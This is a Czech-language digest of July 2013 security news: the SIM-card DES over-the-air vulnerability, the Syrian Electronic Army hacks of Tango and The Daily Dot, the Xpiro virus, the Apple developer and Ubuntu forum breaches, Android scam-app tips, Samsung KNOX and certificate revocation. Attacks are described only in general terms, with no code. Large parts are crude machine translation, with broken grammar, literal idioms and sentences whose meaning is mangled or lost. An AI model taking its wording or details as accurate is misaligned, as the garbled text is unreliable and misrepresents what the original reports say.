Po výzkumu, který trval asi dva roky a zahrnoval více než tisíc testovaných zařízení a The Sims v nich, Karsten Nohl, vedoucí vědecký pracovník v berlínské Security Research Labs, došla k závěru, že některé 500 milionů SIM karet stále v provozu po celém světě by mohly být ohroženy k útoku. hack začíná, když útočník odešle příkaz, který simuluje legitimního dopravce prostřednictvím SMS na cílové zařízení. Vzhledem k tomu, útočník nemá správný šifrovací klíč, telefon nepřijímá příkaz, ale vrátí chybovou zprávu podepsal s správného klíče. Zranitelné SIM karet jsou ty, které stále používají Data Encryption Standard (DES) pro šifrování klíč . Toto šifrování je snadno rozbit, a pak mohou být použity na dálku překonfigurovat na SIM tak, že přijímá další pokyny jako pro instalaci špionážní aplikace, aniž by uživatel si toho byli vědomi. Znalost šifrovacího klíče umožňuje útočníkovi klonování SIM a použití klonovaného jeden k ověření se jako uživatel. Všichni ve všech, to trvá kolem minuty provést útok z libovolného počítače. Nohl byl v kontaktu s GSM Association o jeho výzkumu a sdílí s nimi i výsledky. On je také naplánován se objevit tento týden na konferenci Black Hat v Las Vegas, kde bude demonstrovat exploit. , ale podle NYT , že nemá v plánu na zpřístupnění v Las Vegas, které operátoři stále používat zranitelné SIM karty, takže jsme ve skutečnosti nemůže vědět, jestli jsme v nebezpečí, nebo ne. Za to, že budeme muset počkat na prosinec, kdy se plánuje na zveřejnění jejich seznam na Chaos Communication Congress.
Syrští hackeři hit Tango, The Daily Dot
23. července 2013. Hacking
Pro-Assad hacker skupina Syrská armáda Elektronický tvrdí , že porušil záložní databázi Tango, společnost za populární stejnojmenné aplikace, ak exfiltrated 1,5 TB denních Back-UPS, BBC zprávy .
The Back-UPS zřejmě obsahovat informace jako jsou kontaktní údaje, telefonní čísla a e-mailové adresy společnosti 120 milionů registrovaných uživatelů, a hacker skupina oznámila, že bude sdílet uvedené informace se syrskou vládu. Byly mezi nimi i několik screenshotů zálohování složky a jeden z protokolu Tango App prokázat svá tvrzení. Společnost potvrdila na Twitteru, že "došlo k narušení počítačové, která vyústila v neoprávněnému přístupu k některým údajům," ale ještě se podělit další podrobnosti. Oni jen dodali, že "pracují na zvýšení jejich bezpečnostních systémů." O několik dní později, skupina vyslala denního tečka tweetu požadující odstranění karikatura Asada doprovázející článek o hack Tango. Poté, co odmítl vyhovět, SEA nejprve vloupal do účtu Gmail jednoho z jejích zaměstnanců, pak se do této lokality administračního panelu a odstranil dotčený článek úplně. Soudě podle screenshotu e-mailu obdrží kádru, Daily Dot zaměstnanců byla informována o potenciální hrozbu dostat hacknutý skupiny, ale nepomohlo to - kádru má pravděpodobně spadl na e-mail kopí phishing a předal své pověřovací listiny přihlašovací e-mail - a možná ti na admin panel - pro útočníky.
Únos SIM karty pomocí Over-The-Air aktualizace
23.července 2013 Mobil | Hacking
Všichni víme, že mobilní telefony byly předmětem zločinci na chvíli teď. Ale Trojanized mobilní aplikace jsou jen jednou Scénář útoku. Některé problémy leží ještě hlouběji do telefonu. Karsten Nohl, německý vědec, který udělal hodně práce s GSM sítí a mobilních telefonů v minulosti, našel kritickou zranitelnost připojený do mobilních telefonů.
Cílem útoku je SIM karta (Subscriber Identification Module), který je přítomen ve všech mobilních telefonech. Tato čipová karta je zodpovědný za jedinečné identifikační číslo známé jako IMSI (International Mobile Subscriber Identity), a také pro manipulaci s šifrování při komunikaci s telefonní sítí. Nohl zjistil, že mnoho SIM karty, namísto použití AES nebo alespoň 3DES, nadále používat šifrování DES standard, který je známo, že jsou slabé a snadno rozbitné s dnešním hardwaru.
Útočník může poslat chytře vytvořený tichý binární SMS aktualizační zprávu přes-the-air (OTA) do mobilního telefonu, a to i bez znalosti privátní podpisový klíč. Přístroj odmítne nepodepsaný zprávu, ale bude to také odpověď s chybovým kódem byla podepsána s 56bitovým DES soukromého klíče. To umožňuje útočníkovi rozlousknout soukromý klíč pomocí brute-force útok. Při testech, Nohl byl schopen zlomit klíč během několika minut pomocí rainbow tables.
Jakmile je klíč známý, útočník může jít dopředu a podepsat škodlivého softwaru aktualizace, které jsou v podstatě mini Java applety, a poslat je přes OTA aktualizace na mobilní telefon. Vzhledem k tomu, podpis odpovídá, budou spouštěny na zařízení. Tyto škodlivé applety mohou tiše posílat prémiové SMS zprávy, které budou vytvářet zisk pro útočníka, nebo odhalit geo-umístění zařízení.
To samo o sobě by bylo dost špatné, ale bohužel některé SIM karty jsou poskytovatelé mají další zranitelná místa v rámci jejich implementace Javy, což má za následek škodlivé Java applety byly schopny vymanit se z karantény. Proto je applet může přečíst informace z jiných appletů, nebo dokonce vyjmout hlavní klíč, který se používá k odvození šifrovací klíče pro hlasovou a datovou komunikaci. S více a více funkcí, jako jsou mobilní platební systémy, se spoléhat na SIM kartu to dělá tuto chybu zabezpečení, o to více znepokojující, protože má potenciál pro zneužitelná.
Nohl odhaduje, že na celém světě miliony zařízení jsou náchylné k tomuto útoku. Telekomunikační poskytovatelé byli informováni a některé již začaly filtrovat takové zprávy OTA od sítě. Uživatelé mohou s jejich poskytovatelem, zda jejich SIM karta je zranitelné vůči tomuto útoku, a pokud je to nutné, proveďte upgrade na novější kartu, na které není zranitelný. Výzkum v oblasti bezpečnosti Labs odhalí další podrobnosti o zranitelnosti v průběhu následujících bezpečnostních konferencích, z nichž budeme reportovat živě.
První Rozšířené Virus Cross infekce
23.července 2013 Virus
Poté, co byl v zapomnění na chvíli, rodina Xpiro souborů škodlivin je zpět s třeskem-a tentokrát s některými notoricky známých schopností. Nejen, že nová varianta nakazit 32bitové soubory, ale také rozšířila svou působnost infekce 64bitových souborů. Infekce jsou cross-platformní (32-bit Xpiro varianta může infikovat 64bitové spustitelný soubor, a naopak) a trvalé povahy. Navíc tento virus rovněž posílilo své informace krást schopnosti přidáním Firefox a Chrome prohlížeče ke sledování relací.
Cross-infekce a vytrvalost I když jsme viděli křížové škodlivin v minulosti, Xpiro je první rozšířený rodina škodlivin, které implementuje tuto funkci. Tato nová varianta může infikovat spustitelné soubory z následujících architektur: Intel 386 (32-bit) Intel 64 (64-bit) * AMD64 (64-bit) Tvůrci Xpiro se snaží infikovat větší množství počítačů. Jsou nezůstane kámen na kameni při svých pokusech se zavedením této cross-nákazu schopnosti s vytrvalostí.
Tradičně souborů škodlivin bylo známo, šíří tím, že nakazí ostatní spustitelné soubory, aniž by se starat o vytrvalosti. Tato varianta používá vychytralý techniku k dosažení obou. Za prvé, je to výčet všech win32 služby a snaží se infikovat servisní soubory. Potom následuje všechny soubory (odkaz. Lnk) na pracovní ploše uživatele a start menu složky infikovat cílové soubory. To vybere tyto soubory, protože mají nejvyšší pravděpodobnost, že budou řízeny systémem či uživatelem, když je počítač poprvé začíná, a zůstává tedy přetrvávající na následné restartování. Nakonec se infikuje všechny spustitelné soubory z disků C do Z v případě, že disk je pevné, odnímatelné, nebo mapovat.
* V Intel64 bitové soubory jsou nakaženi nové varianty, ale kvůli chybě ve svém kódu, to skýtá poškozené soubory. Symantec detekuje a opravy těchto souborů jejich správného stavu.
Lepší informace krást Konečným cílem Xpiro bylo ukrást informace z infikovaného hostitele. Cíl zůstává stejný, kromě toho, že je stealthier teď. Když Xpiro infikuje běží na počítači, je nyní také přidává Firefox nebo Chrome rozšíření, kromě napadení spustitelné soubory. Rozšíření pro Firefox, skrytá, ale rozšíření Chrome s názvem "Google Chrome 1.0", takže to může projít jako čistý rozšíření a maskovat svou přítomnost. Rozšíření pro Firefox, například, můžete provádět následující akce: Skrýt příponu přítomnost Dolní zabezpečení prohlížeče Spy na aktivitě uživatelů internetu Steal záznamy Přesměrování prohlížeče na předdefinované adresy URL Po instalaci, při otevření nové instance aplikace Firefox a je vidět, že nový add-on byl nainstalován, ale přípona nemůže být nalezen v seznamu přípon.
Rozšíření Xpiro skrývá se od rozšíření seznamu, které ukazují stejný počet rozšíření před a po infekci. To také snižuje zabezpečení prohlížeče úpravou konfiguraci prohlížeče.
Když se uživatel pokusí aktualizovat prohlížeč nebo rozšíření prohlížeče, budou aktualizace neproběhne, protože Xpiro nahradí URL aktualizace s 127.0.0.1, což je lokální IP adresu. Xpiro to dělá, aby se zabránilo jakékoliv změny v konfiguraci, které mohou případně vystavit sebe jako malware.
Skryté přípony zakazuje mnoho bezpečnostních upozornění normálně zobrazené v prohlížeči varovat uživatele. Rozšíření také zakáže některé Bezpečného prohlížení vlastnosti, které by jinak poskytují phishingem ochranu uživatele při aktivaci.
Xpiro sleduje všechny aktivity HTTP v prohlížeči a nahrává na vzdálený server. To pak stáhne následující seznamy z předdefinovaných serverů: Cílová URL Přesměrování adresy URL Když uživatel přejde do jedné cílové URL v seznamu, rozšíření přesměruje prohlížeč na odpovídající URL z přesměrování seznamu. Přesměrování URL může být inzertní strana nebo strana, která stáhne další malware.
V Xpiro útočníci přešli Hrozba funkčnost perzistentní, stealthier, a co je nejdůležitější, aby cross-infikují spustitelné soubory na různých platformách. Ostatní infikuje rodiny lze očekávat, že následovat a přidejte propracovanou funkcionalitu svém arzenálu, aby byl silnější a životaschopné napříč různými platformami. Symantec je však zavazuje chránit vaše data a informace proti takové pokročilé hrozbami. Symantec detekuje novou variantu rodiny Xpiro jako W32.Xpiro.D a W64.Xpiro a také opravy poškozených souborů. Zákazníci Symantec se doporučuje, aby definice virů aktuální.
Nebezpečný svět dnešního IT
Je na čase provést každodenní zamyšlení, jak je online svět špatný... Nebo firmy jej provozující neopatrné a lhostejné...
Bezpečnost
Podívejme se na výběr ze zpráv z uplynulých třech dnů.
Sobota. Služba s diskusemi pro uživatele systému Linuxu Ubuntu byla úspěšně napadena a útočníci získali přístup k lokálnímu souboru se jmény uživatelů, hesly a emailovými adresami. Soubor byl šifrován, ale uživatelům bylo doporučeno předpokládat, že tyto informace byly prozrazeny...
Neděle. Apple připouští, že web pro vývojáře, který není od čtvrtka dostupný, byl úspěšně napaden. A informace byly ukradeny. Pravděpodobně nějaké fyzické adresy, možná emaily a můžeme se jen modlit, aby nebyly kompromitovány digitální certifikáty, kterými vývojáři podepisují své aplikace...
Pondělí. Potvrzuje se, že miliony, možná miliardy telefonů lze zdálky ovládnout pomocí speciální SMS. Podle nového výzkumu, který bude 31. července prezentován na konferenci Black Hat security, existuje jednoduchá metoda, jak zdálky získat přístup k lokaci telefonu, SMS a dalším funkcím. Podle všeho jsou sice karty SIM chráněny šifrováním, ale po celé desetiletí obsahují některé typy SIM „drobnou“ chybu. Na určitý typ příchozí SMS odpovídají chybovým hlášením, které obsahuje hash vlastního 56bitového privátního klíče. K jeho převedení do použité podoby stačí 2 minuty výpočtů běžného osobního počítače...
V současném digitálním světě se můžeme spolehnout na jedinou věci... že naše osobní data nejsou v suchu a bezpečí. Možná jsme uživateli zkušenými a opatrnými a naše vlastní počítače jsou šifrovány, za firewally, zálohovány dvěma různými metodami na různá média. Pracujeme pod účtem bez administrátorských práv, náš souborový systém dozoruje nějaké pokročilejší řešení zabraňující „silent bit rotting.“ Systém je od „značkového výrobce“ a pravidelně aktualizován „značkovými aktualizacemi“. Antivirus je tak dobrý, a tak se na pozadí usilovně něčím zaměstnává, že se na počítači prakticky nedá pracovat v reálném čase. Před dětmi a útočníky jsou fyzicky chráněny elektrickým ohradníkem.
Ale je to všechno k něčemu? Každodenní selhání ochran obrovských společností, které si mohou dovolit používat to nejlepší zabezpečení, mají vlastní týmy až na dno certifikovaných expertů na bezpečnost, naznačují něco jiného.
Pro někoho je uklidňující myšlenka, že jeho samotný počítač nemůže být pro profesionální kyberzločince jako cíl zajímavý, zejména pokud vezme v potaz stav svého bankovní konta. Ale to nic neznamená. Většina útoků funguje na bázi automatizovaného kobercového „bombardování“ a útočnici berou vše, co jim přijde pod ruku, s tím, že se to může hodit později a celí balík informací stejně předávají třetím stranám.
Stále ještě platí, že víceméně bezpečný počítače je ten vypnutý, umístěný v zatopeném sklepním trezoru. (Doporučuje se ionizovaná voda a uzemněná vodivá vana bazénu, aby se zabránilo některým „induktivním technikám“).
Ale co z toho, pokud stále více dat migruje od bezmocných uživatelů do online serverů a technologií, které je zpřístupňují i té nejvzdálenější čínské vesnici (která má občas k dispozici lepší konektivitu, než průměrná česká korporace)? A provozovatelů serverů a služeb budou vždy preferovat kompromisní přístup k bezpečnosti, pokud tedy sami rovnou naše data nepředprodávají dalším stranám. Ale i to je stále ještě zbytečně optimistické tvrzení. Naše data jsou zapomínána na barových stoličkách, darována cizím státním agenturám výměnou na uvolněnější přístup k cizímu trhu atd...
Apple developer stránky napadeny hackery - úniku jisker "bezpečnostní opravy" Zaslal: 22 červenec 2013 05:59 PDT Incidenty Apple Developer web byl hacknut minulý týden, a zůstal offline dní po útoku, který Apple připouští, může odhalili, "jména, poštovní adresy a e-mailové adresy." Bezpečnostní výzkumník tvrdil, že hack vystaveno až 100.000 uživatelů " detaily.
Vniknutí vyvolala bezpečnostní přepracování web pro vývojáře, který zůstal v režimu offline několik dní v důsledku útoku. "Aby se zabránilo ohrožení zabezpečení, jako se to nestalo znovu, jsme zcela oprava pro vývojáře systémů, aktualizujeme naše serverového softwaru, a přestavět celé své databáze," Apple uvedl ve svém prohlášení.
UK-based výzkumník se přihlásila k odpovědnosti za útok se prostřednictvím svého kanálu na YouTube a příspěvku na TechCrunch, řka: "Mé jméno je Ibrahim Balič, jsem bezpečnostní výzkumník. Můžete také vyhledávat své jméno od whitehat seznamu Facebooku. Nedávno jsem začal dělat výzkum na Apple inc.
"Jeden z těch chyb, které mi poskytl přístup k uživatelům detaily atd. Okamžitě jsem nahlásil Apple. O čtyři hodiny později z mé závěrečné zprávy Apple Developer portál plynu uzavřena a víte, že to ještě není. Mám více než 100.000 + uživatelé detaily a Apple je o tom informován. Nechtěl jsem pokoušet získat údaje a první zprávy pak, místo toho jsem se hlásil jako první. "
Apple nebyl dosud veřejně potvrdit nebo popřít Balič zprávu. Společnost ve svém prohlášení, "Minulý čtvrtek útočník pokoušel zabezpečit osobní údaje našich registrovaných vývojářů z naší vývojáře webových stránek."
"Citlivé osobní informace byly šifrovány a nemůže být zobrazena, jsme však nebyli schopni vyloučit možnost, že jména některých vývojářů, e-mailové adresy a / nebo e-mailové adresy může být přístupné," uvedla společnost. "V duchu transparentnosti, chceme Vás informovat o problému. Vzali jsme na webu se okamžitě ve čtvrtek a pracují nepřetržitě od té doby. "
Příspěvek Apple developer stránky napadeny hackery - úniku jisker "bezpečnostní opravy" se objevila na prvním místě Žijeme zabezpečení.
Je vaše nová aplikace, jak to vypadá? Jak rozpoznat nejnovější Android podvody Zaslal: 22 červenec 2013 05:10 PDT Hacking Špinění "špatné" aplikací na Android není vždy jednoduché - u zločinci hledání nových triků každý měsíc oklamat telefonu a tabletu uživatele do stahování malware.
I když použijete "bezpečné" obchody, jako je Google Play nebo Amazon App Store, je to ještě možné, aby se ošizen - nebo ještě něco horšího. I když aplikace vypadá jako jeden víte, a má pěti-hvězdičkový hodnocení, mohlo by to být nebezpečné. Android malware je na vzestupu na celém světě v letošním roce - jen v jednom "očištění" svého Play Store, Google odstranil 60000 "špatné" aplikace. ESET Security Evangelist Stephen Cobb analyzuje některá rizika v podrobném blogu zde.
Níže jsou uvedeny některé z varovných příznaků, měli byste dávat pozor před stažením nové aplikace.
Dejte si pozor, pokud aplikace čekáte na dorazí brzy
Počítačoví zločinci číst zprávy - a cílové falešné verze aplikací kolem data vydání reálných, netrpělivě očekávaná aplikace. Například, podvodníci vydala verzi BBM - BlackBerry instant messenger software - na údajnou datum vydání softwaru na Android letos. BlackBerry předtím řekl, že pověst byla špatně - ale to nezachrání 100.000 uživatelům stažení aplikace, který vydal nechtěné reklamy uživatelům, a nevyšel vůbec.
Dejte si pozor na "free" verze známých aplikací
Prediktivní psaní aplikace SwiftKey zaznamenává stisky kláves "učit se" vaše styl psaní - tak to bylo jen přirozené, že zločinci by to pirát, a přidat keylogger, který používá funkci ukrást vaše soukromá data místo. "Free" verze aplikace se objevily rychle na pirátských stránkách - infikování uživatele tak hloupý ke stažení. Stránky, které nabízejí "zdarma" APKs slavných, nejprodávanější aplikace může nabídnout stejné aplikace, ale upraven tak, aby přidat další funkce, včetně adware a programy zaznamenávající stisky kláves. SwiftKey vlastní zpráva zdůrazňuje, jak snadné je se zmást.
Příliš dobré, aby to byla pravda? Je to asi je Android uživatelé dožadovali verzi hry hit PC FTL - takže když jeden vyskočila na Google Play, lidé stáhli. Aplikace dokonce vysokou hvězdiček - ale jen proto, že uživatelé nuceni dát vysoké hodnocení před stažením. To byl rychle odstraněn, ale ne dříve, než stovky uživatelů byli oklamáni. FTL vývojáři již dříve řekl, že by se žádná verze Android. Pokud se něco objeví, že se zdá být sen, přečíst recenze a vyhledávání mimo obchodě kupujete na - jinak byste mohli být za noční můru.
Myslíš, že jako jste nakupování na eBay
Ne všechno na Play Store Google lze důvěřovat - aplikace nejsou schváleny před objevit na prodejně. To znamená, že některé "scammy" nebo Trojanised apps objeví na Play. Klíčem k úspěchu je, že jako jste nakupování na neregulovaném trhu, jako je eBay. Existují dobré hodnocení pro tuto aplikaci? Ještě vývojáři nějaké jiné aplikace? Co jejich webové stránky vypadat? Co znamenají recenze říct? Aplikace bez jakýchkoli hvězdných hostů jsou většinou špatné zprávy.
Nenechte se zmást tím stránkách "výhodné"
Existují tisíce stránek, které nabízejí "zdarma" Android Apps - mnohé z nich se tváří jako stránky "recenze", kde se přezkum ve skutečnosti zkopírovat a vložit z popisu Google Play, a na webu je cílem nalákat vás do stahování "free" verze aplikace. Jakékoli stránky nabízející zdarma APKs populárních titulů Android by měly být považovány s extrémním podezřením. Pokud se budete držet na webové stránky, jako je Google Play, Amazon App Store a GetJar, budete mít mnohem bezpečnější - i když "špatné" aplikace mohou ještě dostat do nich.
Dobrá aplikace může "obrátit špatnou"
Dávejte si pozor na In-App nákupy - některé aplikace používat k přímé uživatele na nebezpečné stránky. Nedávná aplikace pro Android (od odstranit) nabídl uživatelům výběr písma, z nichž všechny byly k dispozici jako In-App nákupy -, ale i odkazy na stažení uvedlo, že byly ke stažení z Google Play, se ukázal místo na vzdáleném místě, a stáhnout spyware na stroj. Buďte si absolutně jistý, kde kupujete od.
Pročtěte si každý App oprávnění
"App oprávnění" obrazovka, která se objeví při instalaci nové aplikace, je důležité - nevynechávejte za ně. Spammy nebo scammy aplikace bude požadovat přístup k velkému množství informací - všechny vaše textové zprávy, nebo všechny síťové komunikace. Pokud aplikace požaduje velké množství informací, a je to jen spořič obrazovky, budík nebo foto editor, neinstalujte.
Nepředpokládejte, pěti-hvězdičkové hodnocení znamená, že je v pořádku
Stojí za to si udělali čas na přečtení pár recenzí - některé spammy apps "síla" Uživatelé dát pět hvězdiček před stažením, aby se vám jeví vysoce hodnocen. Pokud budete číst recenze kanálu, když uvidíte, že je plný uživatelů zuřivý nad tím, že podvádí.
Google je "Ověření Aplikace" může pomoci
Ověřit aplikace byla zavedena v Android 4.2 - a je to užitečné, poslední linii obrany proti scammy aplikací nebo trojské koně. To může být povolen v nastavení, bezpečnosti - a nabízí varování, pokud aplikace mohou poškodit vaše zařízení. Je také třeba poznamenat, že zároveň umožňuje zařízení pro instalaci aplikací z neznámých zdrojů mohou být užitečné - například, pokud vaše pracoviště "tlačí" ven pracovní aplikace - je to bezpečnější, aby tuto možnost vypnout, dokud ji budete potřebovat.
Příspěvek je vaše nová aplikace, jak to vypadá? Jak rozpoznat nejnovější android podvody poprvé objevil na Žijeme zabezpečení.
"Obrovsky významná" SIM karta zranitelnost opustí miliony mobilních telefonů v ohrožení Zaslal: 22 červenec 2013 03:44 PDT Zranitelnosti | Hacking | Mobil Miliony SIM karet v použití dnes jsou náchylné k hackování - umožňuje útoky, kde by SIM karty lze klonovaných dálku nebo hlasové čísla mohou být změněna, podle německé bezpečnostní výzkumník.
Zranitelnost používá Sedmdesátá léta-éra šifru ještě používá na milionech SIM karet po celém světě, podle Karsten Nohl a bezpečnosti výzkumných laboratoří. Nohl výzkum budou prezentovány na konferenci o bezpečnosti v BlackHat v Las Vegas na 31. července. Karsten Nohl říká: "S více než sedm miliard karet v aktivním používání může být i SIM karet nejrozšířenější bezpečnostní klíč na světě."
"Můžeme špehovat na vás. Známe své šifrovací klíče pro volání. Můžeme číst vaše SMS. Více než jen špionáže, můžeme krást data z karty SIM, mobilní identity a náboje do svého účtu ", Nohl řekl v rozhovoru pro New York Times.
Existuje šest miliard mobily v současné době používají - a mnozí stále používat zastaralé šifrování DES. Nohl testováno 1000 SIMS více než dva roky, a zjistil, že zhruba jedna čtvrtina byli zranitelní. OSN Mezinárodní telekomunikační unie přezkoumala výzkum a popsal ho jako "velmi významný". Generální tajemník ITU Hamadoun Touré řekl: "Tyto výsledky ukazují nám, kde bychom se mohli ubírat, pokud jde o kybernetické rizik."
Nohl tvrdí, že over-the-air aktualizace softwaru - odeslat jako kryptograficky zabezpečených SMS zpráv - pomocí vlastního softwaru Java, představuje "kritickou hacking riziko." Hackeři pošle nesprávně podepsaný příkaz OTA - ale karty odpoví kryptografického podpisu, který mohou být vyřešeny na 56-bitový klíč na "standardní počítač", a pozdní proliferace Nohl. To umožňuje útočníkovi nainstalovat Java applety.
Nohl říká: "Java applet může vymanit se z jeho oblasti a přístup zbytek karty. To umožňuje vzdálený klonování možná miliony SIM karet, včetně jejich mobilní identity (IMSI, Ki), stejně jako platební pověření uložených na kartě. Applety mohou posílat SMS, hlasové pošty změnit čísla a dotaz na polohu telefonu, kromě mnoha jiných předdefinovaných funkcí. Tyto schopnosti samy o sobě poskytují dostatek potenciálu pro zneužívání. "
Nohl říká, že obrovské množství karet "starších" SIM v použití znamená, že problém může být komplikovaná. Nové gnerations karet by měly být navrženy tak, aby odolat takové útoky, říká, ale mobilní telefony a sítě by také měly přijmout obrany.
"Karty je třeba použít state-of-art kryptografie s dostatečně dlouhými klíči, neměly zveřejňovat podepsané holé útočníkům, a musí zavést bezpečné Java virtuální stroje. Zatímco některé karty již téměř tohoto cíle, v letech potřeboval nahradit zranitelné starší karty vyžadují dodatečné obranu, "říká Nohl.
Post "obrovsky významné" SIM karta zranitelnost opustí miliony mobilních telefonů v ohrožení se objevil na prvním místě Žijeme zabezpečení.
Apple Developer Site porušení
27.7.2013 Incident
Apple uzavřen přístup k jeho web pro vývojáře po zjištění, že byla compromissed a vývojáři osobní údaje byly porušeny [1].
V vyvěšen na webu Apple vysvětlil, že někteří vývojáři osobní údaje jako je jméno, e-mailovou adresu a e-mailové adresy může být zobrazena. Poznámka nezmiňuje hesla, nebo pokud heslo hash byly přístupné.
Jedna hrozba často zapomíná těchto porušení je phishing. Pokud má útočník přístup k některé osobní informace spojené s webem, je poměrně snadné sestavit přiměřeně přesvědčivé podvodných e-mailu pomocí skutečnost, že web byl porušen trik uživatelé obnovit své heslo. Tyto e-mail může být přesvědčivější, pokud obsahují uživatele uživatelské jméno, skutečné jméno nebo poštovní adresu, jak byly uloženy s webem.
Video na YouTube tvrdí, že ukazují záznamy získané v compromisse [2]. Video se uvádí, že 100.000 závěrky byly přístup, aby Apple vědomi zranitelnosti na svých internetových stránkách, a že data budou vymazána.
Ubuntu fóra jsou nyní mimo provoz, protože byly porušeny. Podle jejich místo, "útočníci dostali každý uživatel lokální uživatelské jméno, heslo a e-mailovou adresu z Ubuntu Fórum databáze." [1] Mají doporučuje svým uživatelům, že pokud používáte stejné heslo s jinými službami, změnit své heslo okamžitě. Další služby, jako je Ubuntu One, Launchpad a dalších Ubuntu / Canonical služby nejsou ovlivněny. Jejich aktuální oznámení je možné přečíst zde .
[1] http://ubuntuforums.org/announce.html
Americké úřady pootevírají dveře zařízením Samsung
Samsung se snaží prosadit v úřadech, které dříve akceptovaly pouze BlackBerry. Je to počátek nové éry pro výrobce mobilů i pro interní oddělení IT.
IT | Hardware
Platforma společnosti BlackBerry (dříve Research in Motion) byla donedávna jediná, která splňovala striktní požadavky na bezpečnost. Tato luxusní pozice se ale začala v posledních letech otřásat. V říjnu minulého roku Pentagon oznámil plány umožnit i jiným výrobcům nabízet své platformy. To byla těžká rána pro BlackBerry, kterou v té době pronásledovaly problémy se zaostávajícím softwarem a zařízeními.
Imigrační úřad USA byl první, který ke změně platformy mobilů skutečně přikročil, když loni svá BlackBerry začal nahrazovat iPhony. Samsung od té doby nechal projít bezpečnostními testy a certifikacemi svá zařízení rodiny Galaxy a podle nepotvrzených zpráv v současné době Samsung jedná o velké zakázce s FBI a americkým námořnictvem.
Podle komentátorů současné dění ukazuje, že Apple i Google dohonily BlackBerry a vyrovnaly se s bezpečnostními standardy, které BlackBerry kdysi pomáhal nastavovat. Současně se oddělení IT jednotlivých agentur konečně „vyrovnávají“ s myšlenkou rovnocenné podpory více mobilních platforem.
Jedním z důvodů, proč se Pentagon vůbec snaží otevřít vůči jiným výrobcům, je přístup k novým a inovativním aplikacím. Mobilní svět již léta zažívá přechod od zařízení orientujících se na maily k ekosystémům postaveným na množství specializovaných aplikací.
Principiálně lze data chránit na úrovni zařízení nebo jednotlivých aplikací. Ochrana na úrovni telefonu je nejpohodlnější pro IT, ale výsledkem bývá značná režie a zatížení prostředků malého zařízení. Požadavky vládních agentur na bezpečnost také značně přesahuji běžnou praxi korporací. Je to pochopitelné, hlavním cílem firem je nabídnout svým uživatelům nástroje pro zvýšení produktivity a bezpečnost bývá kompromisem s ohledem na tento cíl. Vládní agentury a úřady musí na druhé straně trvat na maximálním zabezpečení dat a kompromisy nejsou možné.
Samsung sází na své řešení KNOX, které integruje do bezpečnostně optimalizované instalace Androidu. Obsahuje aplikační kontejner, který umožňuje správcům oddělit osobní aplikace a data od citlivých údajů a korporátních aplikací. Současně souborový systém využívá šifrování AES-256 a jednotlivé aplikace si mohou spouštět vlastního klienta VPN.
Taková řešení představují značný pokrok mobilního světa za poslední desetiletí, ale stále ještě je nelze považovat za dozrálá a ověřená řešení srovnatelná se svými protějšky ve stolních počítačích a serverech.
Elektronický podpis – revokace certifikátu
Pokud ztratíte svou platební kartu, měli byste co nejrychleji požádat příslušnou banku o její zablokování. Nechcete přece, aby si někdo platil nákupy z vašeho účtu. Pokud ztratíte kontrolu nad svým soukromým klíčem, měli byste co nejdříve požádat svou certifikační autoritu o revokaci příslušného certifikátu. Nechcete přece, aby se někdo podepisoval vaším jménem.
Zabezpečení
Ve světě elektronického podpisu mohou nastávat situace velmi podobné poměrům ze světa bankovnictví a platebních karet. Najednou zjistíte, že potřebujete zamezit něčemu, co dříve bylo možné a co jste sami běžně používali. Třeba když vám ukradnou platební kartu, je ve vašem zájmu nechat ji co nejdříve zablokovat, aby s ní nemohl platit někdo jiný.
Na něco takového se pochopitelně pamatuje, a tak banky mají mechanizmy, jak platební kartu zablokovat. A jelikož všechny platební transakce procházejí přes banku, která kartu vydala, může být takovéto zablokování stoprocentně účinné.
V případě elektronického podpisu je nebezpečné to, že někdo zjistí hodnotu vašeho soukromého klíče. Nemusí vám ho tedy nijak krást, což vlastně ani nejde vzhledem k nehmotné podstatě soukromého klíče. Stačí jej okopírovat či jinak zjistit jeho hodnotu – a rázem se dotyčný může podepisovat vaším jménem.
Pochopitelně i ve světě elektronického podpisu je dopředu pamatováno na takovouto možnost skrze existenci potřebných „blokačních“ mechanizmů. Ty ale musí fungovat trochu jinak než zablokování platební karty.
Hlavní odlišnost je v tom, že zatímco platby vždy nějak „procházejí“ přes banku, kde mohou být zastaveny, ověřování platnosti elektronického podpisu probíhá distribuovaně, přímo u subjektu, který ověření provádí. Jak tedy tento subjekt přinutit, aby už on sám zkontroloval, zda nedošlo k nějaké obdobě zablokování platební karty? A co by vůbec mělo být touto obdobou ve světě elektronického podpisu?
Certifikáty nedohledáte a nezměníte Ideálním řešením by bylo stáhnout z oběhu všechny certifikáty vystavené k soukromému klíči, jenž byl tzv. kompromitován, resp. nad kterým jeho oprávněný držitel ztratil výlučnou kontrolu. Protože právě certifikát je tím, co je nutné mít k dispozici, aby se nějaký elektronický podpis (či značka) vůbec mohl začít ověřovat.
Jenže certifikáty jsou volně šiřitelné a běžnou praxí je přikládat je ke každému jednotlivému podpisu. Takže nějak je „stáhnout všechny z oběhu“ není z principu možné, protože nemáte šanci je všechny dohledat.
Princip nástěnky Přesto existuje možnost, jak platnost konkrétního certifikátu ukončit ještě dříve, než skončí řádná doba jeho platnosti. Tedy jak jej – k určitému časovému okamžiku – předčasně zneplatnit, resp. odvolat či tzv. revokovat. Jen se to musí udělat jinak než jeho přepsáním.
Můžeme si představovat, že jde o jakousi nástěnku umístěnou u vydavatele certifikátu. Tedy u příslušné certifikační autority. A aby to bylo jednodušší, v každém certifikátu bývá uvedena přesná adresa této nástěnky (ve formě tzv. URL odkazu), a dokonce i adresa jejích záložních verzí.
Seznamy CRL Pro praktické fungování právě naznačené představy s nástěnkou je třeba ještě vyřešit řadu technických aspektů. Například to, jakým způsobem a v jakém formátu na ní budou příslušné informace zveřejňovány, jak často atd.
Zde existují dvě základní varianty. Jedna má „dávkový“ charakter a pracuje s prostým seznamem revokovaných certifikátů, který je průběžně aktualizován a ve své aktuální podobě „vyvěšován“ na nástěnku. Jde o tzv. seznam CRL (Certificate Revocation List neboli seznam revokovaných certifikátů).
Metoda legislativního biče Zastavme se ale ještě u dalšího aspektu: Jak přinutit toho, kdo ověřuje platnost nějakého konkrétního elektronického podpisu či značky (nebo časového razítka, kterého se vše týká také), aby se na příslušnou nástěnku skutečně podíval a pozitivně ověřil, zda nedošlo k revokaci (odvolání, předčasnému zneplatnění) příslušného certifikátu?
